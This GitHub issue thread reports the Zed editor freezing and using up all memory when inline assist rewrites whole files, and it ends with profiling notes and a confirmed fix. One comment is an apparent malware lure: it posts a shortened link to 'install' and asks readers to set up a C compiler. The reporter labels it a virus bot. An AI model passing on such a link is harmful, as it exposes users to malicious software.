### ISSUE TITLE
Zed freezes with high memory usage when using inline assist to rewrite entire files

### ISSUE THREAD

**Issue by EDLLT** [zed-industries/zed#18062]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

Related: https://github.com/zed-industries/zed/issues/15692 https://github.com/zed-industries/zed/issues/17937

Zed Version: 0.152.4
Architecture: x86_64
OS: Ubuntu 24.04

When I use inline assist on my file with 19k tokens, zed starts eating up all my ram and swap then my whole system crashes shortly afterwards.

![Screenshot from 2024-09-19 13-27-45](https://github.com/user-attachments/assets/dceffd6d-c823-4a90-adfe-abc85bae0768)

File I was performing inline assist on(in hopes of improving reproducability)
https://github.com/flxzt/rnote/blob/main/crates/rnote-engine/src/pens/typewriter/penevents.rs
I was telling Zed AI in the inline assist feature after selecting the whole script to "remove occurrences of audio usage"

### Environment

```
            .-/+oossssoo+/-.               edllt@HP 
        `:+ssssssssssssssssss+:`           -------- 
      -+ssssssssssssssssssyyssss+-         OS: Ubuntu 24.04.1 LTS x86_64 
\   .ossssssssssssssssssdMMMNysssso.        Kernel: 6.8.0-41-generic 
   /ssssssssssshdmmNNmmyNMMMMhssssss/      Uptime: 10 days, 2 hours, 10 mins 
  +ssssssssshmydMMMMMMMNddddyssssssss+     Packages: 3971 (dpkg), 49 (flatpak), 
 /sssssssshNMMMyhhyyyyhmNMMMNhssssssss/    Shell: bash 5.2.21 
.ssssssssdMMMNhsssssssssshNMMMdssssssss.   Resolution: 1366x768, 2560x1440 
+sssshhhyNMMNyssssssssssssyNMMMysssssss+   DE: GNOME 46.0 
ossyNMMMNyMMhsssssssssssssshmmmhssssssso   WM: Mutter 
ossyNMMMNyMMhsssssssssssssshmmmhssssssso   WM Theme: Adwaita 
+sssshhhyNMMNyssssssssssssyNMMMysssssss+   Theme: Yaru-dark [GTK2/3] 
.ssssssssdMMMNhsssssssssshNMMMdssssssss.   Icons: Yaru [GTK2/3] 
 /sssssssshNMMMyhhyyyyhdNMMMNhssssssss/    Terminal: gnome-terminal 
  +sssssssssdmydMMMMMMMMddddyssssssss+     CPU: AMD Ryzen 7 3700X (16) @ 3.600G 
   /ssssssssssshdmNNNNmyNMMMMhssssss/      GPU: NVIDIA GeForce RTX 3060 Ti Lite 
    .ossssssssssssssssssdMMMNysssso.       Memory: 3845MiB / 15895MiB 
      -+sssssssssssssssssyyyssss+-
        `:+ssssssssssssssssss+:`                                   
            .-/+oossssoo+/-.                                       
```

### If applicable, attach your `~/Library/Logs/Zed/Zed.log` file to this issue.

<details><summary>Zed.log</summary><pre>

</pre></details>
[Zed.log](https://github.com/user-attachments/files/17057654/Zed.log)

Captured the log while it was running the inline assist

**Comment by KERERCVASD** [comment]
install this
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by EDLLT** [comment]
> install this https://bit.ly/4evXrQ6 If you don't have the c compliator, install it.(gcc or clang)

virus bot

**Comment by CharlesChen0823** [comment]
I can give an step to reproduce. 

- open zed code with Zed
- `ctrl-p` select `x11/window.rs` file
- select all contents
- using inline assist with prompts "can you find bug"
- eat all ram, then unresponse.

**Comment by justageek** [comment]
I'm using 0.154.4 and it still goes bonkers as soon as launched and consumes all RAM, Macbook pro Intel chip

**Comment by mikayla-maki** [comment]
Did some profiling with @mgsloan in heaptrack, it looks like the streaming diff pushes a lot memory, specifically around StreamingDiff::push_new.

**Comment by mgsloan** [comment]
Here's a screenshot of heaptrack for this case.

![Image](https://github.com/user-attachments/assets/e1291c81-5938-4896-accf-398b3438b2c7)

**Comment by mgsloan** [comment]
Confirmed that this is fixed in #20296 

![image](https://github.com/user-attachments/assets/495991ec-fa7e-49f8-8233-a7b50bd66c9c)
